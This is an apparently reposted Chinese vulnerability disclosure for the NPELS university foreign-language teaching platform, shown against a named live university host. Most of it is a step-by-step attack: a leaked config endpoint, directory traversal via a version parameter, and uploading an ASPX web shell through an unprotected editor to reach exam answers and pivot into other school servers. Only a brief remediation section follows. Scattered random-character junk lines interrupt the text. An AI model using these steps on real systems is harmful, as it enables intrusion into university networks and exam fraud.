新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中
. b6 r4 h' a: r4 ^6 P1 g4 Y
/ y" l) N5 Y0 |3 Y2 Q  n4 q0 f# |, x详细说明：

& m* |9 |* d" I/ K% E& D1 y& @以南开大学的为例:
http://222.30.60.3/NPELS
2 V' T; V# @% i& f+ {/ P( U9 N# mNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
7 j0 e1 E; L  E: L# H  H: _<setting name="Update_CommonSvr_CommonService" serializeAs="String">
$ c5 p5 |: a' H" Q" h<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
" L1 a4 M- ^# N( @: U/ F</setting>
% Q* X) C6 n  n, @! D! s及版本号
<add key="TVersion" value="1, 0, 0, 2187">
</add>
直接访问
http://222.30.60.3/NPELS/CommonService.asmx
使用GetTestClientFileList操作，直接 HTTP GET 列目录：
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
/ a7 U' Z6 S& o5 qhttp://222.30.60.3/NPELS/CommonS ... List?version=../../

发现
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
. r0 W5 {* D2 l' J6 |! b上传后继续列目录找到木马地址直接访问即可
' A- t. ]& H3 e7 C4 J2 {, [
OOXX
& v0 i* ], d5 [3 p  a  s; x# Z* v
+ v7 H: Z1 ^# T  T8 mGoogle "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
3 C4 U: }# m/ j. B漏洞证明：
6 r% q# l, E, L7 [3 j
列目录：
http://222.30.60.3/NPELS/CommonS ... List?version=../../
文件上传：
# \* ~( ^7 F/ C7 r& e( xhttp://222.30.60.3/npelsv/editor/editor.htm

上传木马：
( m* t8 _" W2 L# l  z2 Bhttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx

修复方案：
* u) c+ g- w1 q6 s: n$ S好像考试系统必须使用 CommonService.asmx
最好配置文件加密或者用别的方式不让它泄露出来
并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​